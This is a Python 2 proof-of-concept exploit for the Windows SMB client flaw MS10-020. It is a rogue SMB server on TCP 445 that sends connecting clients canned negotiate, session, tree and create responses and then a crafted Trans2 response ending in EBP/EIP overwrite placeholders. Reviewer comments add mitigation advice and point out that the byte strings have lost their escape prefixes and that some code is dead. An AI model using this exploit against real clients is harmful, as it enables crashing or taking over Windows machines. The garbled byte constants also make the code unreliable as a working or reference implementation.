ms10-020.txt
Posted on 19 April 2010
"""
Rogue SMB1 server that answers a connecting client with a fixed sequence of
pre-built SMB responses, ending in a Trans2 QUERY_FS_INFO response whose tail is
the EBP/EIP placeholder values defined below.

Defender's view: MS10-020 covered flaws in the Windows SMB *client's* handling
of responses returned by a server, so the exposure is on any client that is
induced to connect to a host running this on TCP 445. Mitigation is the
MS10-020 update; detection and containment also cover alerting on or blocking
outbound SMB (TCP 445) from clients to untrusted or internet hosts.

NOTE(review): this listing appears to have lost the escape prefixes of its byte
strings, so the constants as shown are plain ASCII text rather than the frames
their names describe. Python 2 syntax (print statements, SocketServer).
"""
import sys,SocketServer

# Placeholder values appended to the final Trans2 response. The names suggest
# they are the saved-frame/return-address overwrite of the client-side flaw;
# the listing itself does not show how the client consumes them -- treat as
# unverified.
EBP = "x42x42x42x42"
EIP = "x41x41x41x41"

# Negotiate Protocol response (SMB header command 0x72; see handle()).
# Each constant below is one complete NetBIOS-framed SMB response: a 4-byte
# NetBIOS length prefix followed by the "\xffSMB" header and body.
packetnego = (
    "x00x00x00x55"
    "xffx53x4dx42x72x00x00x00x00x98x53xc8x00x00x00x00"
    "x00x00x00x00x00x00x00x00x00x00xffxfex00x00x00x00"
    "x11x05x00x03x0ax00x01x00x04x11x00x00x00x00x01x00"
    "x00x00x00x00xfdxe3x00x80x1ax49xf9x22xfbx86xcax01"
    "x88xffx00x10x00xf0xe4x54xc4x50x6cxb2x4axb9x3ax6b"
    "xcfxb0x8cx8dxaf"
)

# First Session Setup AndX response: per the handler's comment an NTLMSSP
# CHALLENGE with status STATUS_MORE_PROCESSING_REQUIRED, carrying a fixed
# server challenge and fixed target/OS strings.
packetsession = (
    "x00x00x01x3d"
    "xffx53x4dx42x73x16x00x00xc0x98x07xc8x00x00x00x00"
    "x00x00x00x00x00x00x00x00xffxffxffxfex00x08x10x00"
    "x04xffx00x3dx01x00x00xc8x00x12x01x4ex54x4cx4dx53"
    "x53x50x00x02x00x00x00x0cx00x0cx00x38x00x00x00x15"
    "x82x8axe2x16x7ax68x5fxc6x0cx78xd8x00x00x00x00x00"
    "x00x00x00x84x00x84x00x44x00x00x00x05x01x28x0ax00"
    "x00x00x0fx46x00x55x00x43x00x4bx00x55x00x32x00x02"
    "x00x0cx00x46x00x55x00x43x00x4bx00x55x00x32x00x01"
    "x00x0cx00x46x00x55x00x43x00x4bx00x55x00x32x00x04"
    "x00x22x00x66x00x75x00x63x00x6bx00x75x00x32x00x2e"
    "x00x74x00x65x00x73x00x74x00x2ex00x6cx00x6fx00x63"
    "x00x61x00x6cx00x03x00x22x00x66x00x75x00x63x00x6b"
    "x00x75x00x32x00x2ex00x74x00x65x00x73x00x74x00x2e"
    "x00x6cx00x6fx00x63x00x61x00x6cx00x06x00x04x00x01"
    "x00x00x00x07x00x08x00xe8x62xc8x16xfbx86xcax01x00"
    "x00x00x00x00x57x00x69x00x6ex00x64x00x6fx00x77x00"
    "x73x00x20x00x35x00x2ex00x31x00x00x00x57x00x69x00"
    "x6ex00x64x00x6fx00x77x00x73x00x20x00x32x00x30x00"
    "x30x00x30x00x20x00x4cx00x41x00x4ex00x20x00x4dx00"
    "x61x00x6ex00x61x00x67x00x65x00x72x00x00"
)

# Second Session Setup AndX response (authentication accepted regardless of
# what the client sent -- the server never inspects the client's token).
packetsession2 = (
    "x00x00x00x75"
    "xffx53x4dx42x73x00x00x00x00x98x07xc8x00x00x00x00"
    "x00x00x00x00x00x00x00x00xffxffxffxfex00x08x20x00"
    "x04xffx00x75x00x01x00x00x00x4ax00x00x57x00x69x00"
    "x6ex00x64x00x6fx00x77x00x73x00x20x00x35x00x2ex00"
    "x31x00x00x00x57x00x69x00x6ex00x64x00x6fx00x77x00"
    "x73x00x20x00x32x00x30x00x30x00x30x00x20x00x4cx00"
    "x41x00x4ex00x20x00x4dx00x61x00x6ex00x61x00x67x00"
    "x65x00x72x00x00"
)

# Tree Connect AndX response (service type "IPC" per the trailing bytes).
packetree = (
    "x00x00x00x38"
    "xffx53x4dx42x75x00x00x00x00x98x07xc8x00x00x00x00"
    "x00x00x00x00x00x00x00x00x00x08xffxfex00x08x30x00"
    "x07xffx00x38x00x01x00xffx01x00x00xffx01x00x00x07"
    "x00x49x50x43x00x00x00x00"
)

# NT Create AndX response; the handler's comment gives FID 0x4000.
packetntcreate = (
    "x00x00x00x87"
    "xffx53x4dx42xa2x00x00x00x00x98x07xc8x00x00x00x00"
    "x00x00x00x00x00x00x00x00x00x08x84x08x00x08x40x00"
    "x2axffx00x87x00x00x00x40x01x00x00x00x00x00x00x00"
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    "x00x00x00x00x00x00x00x00x00x00x00x00x80x00x00x00"
    "x00x10x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
    "x02x00xffx05x00xffxa2x00x00x00x00x00x00x00x00x00"
    "x00x00x00x00x00x00x00x00x00x00x00x00x00x9bx01x12"
    "x00x9bx01x12x00x00x00"
)

# Trans2 response (QUERY_FS_INFO per the handler's comment). The data area is
# a run of filler bytes followed by EBP and EIP; this is the response the
# vulnerable client is expected to mishandle, so it is the frame a network
# sensor would key on (crafted Trans2 response from a non-fileserver host).
packetrans = (
    "x00x00x00x5a"
    "xffx53x4dx42x32x00x00x00x00x98x07xc8x00x00x00x00"
    "x00x00x00x00x00x00x00x00x00x08x30x0bx00x08x50x00"
    "x0ax02x00x18x00x00x00x02x00x38x00x00x00x18x00xff"
    "xffx00x00x00x00x1fx00x00x00x00x00x00x00x10x00x00"
    "x41x42x43x44x45x46x47x48x49x50x51x52x53x54x55x56"
    "x02x61"+EBP+EIP
)


class SMB1(SocketServer.BaseRequestHandler):
    """Per-connection handler: dispatch canned responses on the SMB command byte.

    The command byte is read from offset 8 of the received frame (4-byte
    NetBIOS header + "\xffSMB" = 8 bytes, so offset 8 is the SMB Command
    field). Nothing about the client's request is validated beyond that byte.
    """

    def server_bind(self):
        # NOTE(review): a BaseRequestHandler has no `socket` attribute and the
        # TCPServer created below never calls this method on the handler
        # class, so this appears to be dead code. SOL_SOCKET, SO_REUSEADDR and
        # SO_REUSEPORT are also not imported anywhere in this listing.
        self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
        self.socket.bind(self.server_address)

    def handle(self):
        # Loop on the connection until recv() or indexing raises; every
        # exception (including an empty read making data[8] an IndexError)
        # is caught by the broad handler below and ends the session.
        try:
            while True:
                print "From:", self.client_address
                data = self.request.recv(1024)
                ## Negotiate Protocol response
                if data[8] == "x72":
                    self.request.send(packetnego)
                    print "Negotiate Response sent "
                ## Session Setup AndX response, NTLMSSP_CHALLENGE,
                ## Error: STATUS_MORE_PROCESSING_REQUIRED
                if data[8] == "x73":
                    self.request.send(packetsession)
                    print "Session Response sent "
                    # Second Session Setup AndX leg: read the client's
                    # authenticate message and accept it unconditionally.
                    data = self.request.recv(1024)
                    if data[8] == "x73":
                        self.request.send(packetsession2)
                        print "Session 2 Response sent "
                ## Tree Connect AndX response
                if data[8] == "x75":
                    self.request.send(packetree)
                    print "TREE Response sent "
                ## NT Create AndX response, FID: 0x4000
                if data[8] == "xa2":
                    self.request.send(packetntcreate)
                    print "NT create Response sent "
                ## Trans2 response, QUERY_FS_INFO -- the crafted frame
                if data[8] == "x32":
                    self.request.send(packetrans)
                    print "Trans2 Response sent box pwned "
        except Exception:
            # Broad catch: any socket error or short read ends the session
            # silently apart from the log line; no error detail is kept.
            print "oups"
            self.request.close()
            print "Disconnected from", self.client_address


# Listen on all interfaces, TCP 445 (binding this port normally needs root /
# Administrator and conflicts with a real SMB service on the host).
SocketServer.TCPServer.allow_reuse_address = 1
launch = SocketServer.TCPServer(('', 445),SMB1)
launch.serve_forever()